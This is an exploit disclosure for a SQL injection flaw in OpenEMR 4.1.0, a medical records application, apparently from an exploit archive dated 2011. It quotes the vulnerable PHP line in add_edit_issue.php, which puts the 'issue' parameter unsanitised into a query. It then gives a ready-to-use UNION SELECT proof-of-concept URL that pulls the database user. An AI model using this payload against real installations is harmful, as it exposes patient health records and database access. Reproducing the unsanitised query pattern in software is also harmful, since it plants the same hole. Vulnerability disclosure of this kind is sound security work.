18 lines
No EOL
771 B
Text
18 lines
No EOL
771 B
Text
# Exploit Title: [Openemr-4.1.0 SQL injection Vulnerability]
|
|
# Date: [2011/10/18]
|
|
# Author: [I2sec-dae jin Oh]
|
|
# Software Link: [http://sourceforge.net/projects/openemr/files/OpenEMR%20Current/4.1.0/openemr-4.1.0.zip/download]
|
|
# Vendor : www.open-emr.com
|
|
# Version: [Openemr-4.1.0]
|
|
# Tested on: [Windows 7]
|
|
---------------------------------------
|
|
source of : /interface/patient_file/summary/add_edit_issue.php:
|
|
|
|
$irow = array();
|
|
if ($issue)
|
|
$irow = sqlQuery("SELECT * FROM lists WHERE id = $issue");; <--------------------- SQL injection
|
|
else if ($thistype)
|
|
$irow['type'] = $thistype
|
|
proof of concept:
|
|
http://[attack url]/interface/patient_file/summary/add_edit_issue.php?issue=0+union
|
|
+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,user(),25,26,27-- |